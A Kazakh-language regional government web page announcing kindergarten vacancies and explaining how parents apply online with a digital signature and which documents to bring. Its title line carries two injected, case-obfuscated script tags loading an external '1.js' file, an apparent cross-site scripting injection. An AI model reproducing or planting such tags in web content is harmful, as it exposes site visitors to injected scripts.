Еркін қол жетімді орындар (akmola.kz)<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.10.2023

Құрметті ата-аналар!

"Балдәурен" балабақшасында мектепке дейінгі ұйымға қабылдау үшін бос орындар бар (әрі қарай МДҰ) .

Қазақ тілінде оқытатын орта топ-6 бос орын (2020 ж. т. балалар);

Қазақ тіліндегі тәрбие мен оқытудың мектепалды тобы - 2 бос орын (2018 ж.т. балалар).

Балаға мемлекеттік мектепке дейінгі ұйымға жолдама алу үшін:

1. Жүйенің негізгі парақшасына кіріп, «Мектеп жасына дейінгі балаларды БМҰ-ға кезекке қою» қызметін таңдау қажет;

2. Тізімнен ауданыңызды немесе қалаңызды таңдаңыз (Шортанды ауданы);

3. Ары қарай кілттерді сақтау орны тізімінен кілтті таңдап, ЭЦҚ (AUTH_RSA кілті) көмегімен жеке кабинетке кіріп, «Сертификатты таңдау» батырмасын басу қажет;

4. Ары қарай ЭЦҚ кілтін (AUTH_RSA кілті) жүктеп, құпиясөзді енгізіп, «ОК» батырмасын басу қажет;

5. Құпиясөз дұрыс енгізілген жағдайда, ЭЦҚ иесінің деректері пайда болады. Осы қадамда «Кіру» батырмасын басу қажет;

6. Берілген өтініштер журналын қарап шығу үшін негізгі парақшадағы «Өтініштер журналы» батырмасын басу қажет;

7. Өтінішті ашу үшін өтініш жолағына басу қажет;

8. Балаларға арналған мектепке дейінгі ұйымдарда бос орындар тізімін қарап шығу үшін «Мемлекеттік балабақшаны таңдау» батырмасын басу қажет;

9. Ары қарай хабарлама түріндегі терезе пайда болады. Бос орындардың тізімін қарап шығу үшін «ОК» батырмасын басу қажет;

10. Ары қарай пайда болған тізімнен қажетті балабақшаны таңдау қажет;

11. Мектепке дейінгі ұйымды таңдағаннан кейін «Қол қою және жіберу» батырмасын басып, ЭЦҚ (RSA) сертификатын жүктеу қажет;

12. ЭЦҚ-ны жүктегеннен кейін кілттер қоймасына құпиясөзді енгізіп, «Кілттер тізімін жаңарту» батырмасын басу қажет;

13. Таңдалынған кілттің деректері пайда болады. Соңғы қадамда «Қол қою» батырмасын басу қажет;

14. Ары қарай Өтініштер журналындағы «Жалпы құжаттар» қойындысынан мемлекеттік мектепке дейінгі ұйымға қалыптастырылған жолдаманы қарап шығып жүктеуге болады.

Содан кейін сіз (ата-аналар/заңды өкілдер) мектепке дейінгі ұйымға келіп, 5 жұмыс күні ішінде жолдаманы тіркеуіңіз керек.

МДҰ-ға келгеннен кейін келесі құжаттарды ұсыну қажет:

1. Қабылдауға арналған жолдама;

2. Ата-анасының бірінің немесе заңды өкілінің жеке басын куәландыратын құжат (сәйкестендіру үшін);

3. Баланың тууын куәландыратын құжат (сәйкестендіру үшін);

4. Қазақстан Республикасы Денсаулық сақтау министрінің 2003 жылғы 24 маусымдағы № 469

бұйрығымен (Нормативтік құқықтық актілерді мемлекеттік тіркеу тізілімінде № 2423 болып тіркелген)

бекітілген "Бала денсаулығы паспорты" 026/у-3 есеп нысанын толтыру және жүргізу жөніндегі

нұсқаулықта қарастырылған нысан бойынша баланың денсаулық паспорты;

5. Баланың денсаулығы туралы анықтама;

6. Психологиялық-медициналық-педагогикалық консультацияның қорытындысы (ерекше білім беру

қажеттілігі бар балалар үшін).

Просмотров: 1981


Пікір қосу



Деректерді қолтаңбаға қосу